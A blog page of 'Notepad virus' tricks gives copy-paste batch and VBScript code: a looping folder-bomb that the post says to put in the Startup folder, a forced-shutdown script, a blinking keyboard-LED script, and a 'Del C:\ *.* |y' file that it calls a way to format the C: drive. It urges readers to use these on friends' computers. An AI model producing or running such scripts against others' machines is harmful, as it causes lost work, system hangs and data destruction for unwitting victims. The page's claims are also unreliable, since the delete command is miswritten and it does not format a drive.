Showing posts with label Notepad virus. Show all posts
Showing posts with label Notepad virus. Show all posts

Wednesday, December 4, 2013

Multiple Folder Virus Via Notepad

You can make multiple folder virus by single notepad tricks.



Code!

****************************************************************

@echo off

:RON

md folder1

md folder2

md folder3

md folder4

md folder5

start folder1

start folder2

start folder3

start folder4

start folder5

goto RON

************************************************************

Effect –> Not Destructive, But sometimes can become very irritating and itchy.
Coding Platform –>  Batch Programming.

Working –>  This code will just create multiple folders each time system starts-up and also open those hundreds of folders. It is not destructive but while executing it can eat up uR system process and results in slow system performance and sometimes could hang system.
Just write or copy the code in notepad and save it as “.bat” extension.


Now goto, START  –>  ALL PROGRAMS  –>  STARTUP FOLDER. Now just copy that .bat file in that folder. Next time system starts, multiple folders are created and will start automatically. You can name folder name anything as you want.


ShutDown Virus Via Notepad

Hi guys! Today am going to share with you the Notepad tricks that can make viruses and trojans. Only for education purpose!



This Post is containing:

BATCH Programming.
C/C++
Python
Visual Basic.

1.  ShutDown  Virus:

This is not a virus! But still its not a friendly one, it can affect and harm your data if not saved. You can set the timing by changing "30" to any amount.

************************************************************

@echo off

shutdown -s -t “30?

************************************************************

Effect –> May Harm uR workings and unsaved data.

Coding  Platform –> Batch Programming.
Working –> On executing, it will shutdown your system immidiately. If your data is not saved, it can harm uR workings. And can sometimes becomes more destructive for normal users.
Type the code or just paste the code in notepad and save it as “.bat” extension.
Example  –>  ron.bat

Tips: If you set the timing "00? then the system will auto shutdown ate the time of startup! This is more harmful for your system. Make it in your friend's systems :P


Saturday, August 3, 2013

Dancing Keyboard Lights

Dancing Keyboard lights


In this part i will show you to make interesting file using notepad which will make keyboard led to dance.
Basically we will be creating a visual basic script.

A SImPLe MetHoD:

1. Open Notepad and copy below codes into it.

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
 
2. Then save this file as dance.vbs (name can be anything but .vbs is must)
 
3. Open your save file and see your keyboard led blinking like disco lights.

EnJOy cOoL TrICk

Creating A Virus That Format C: Drive

How To Make A Virus the delete or format all data of C: drive of a computer in few seconds.


In this trick we will be creating virus in notepad using batch file programming. This virus is really simple to create yet very dangerous.

Method:

1. Open Notepad and copy below code into it.

@Echo off
Del C:\ *.* |y

2. Then Save this file as virus.bat
3. Now, running this file format C Drive.

Enjoy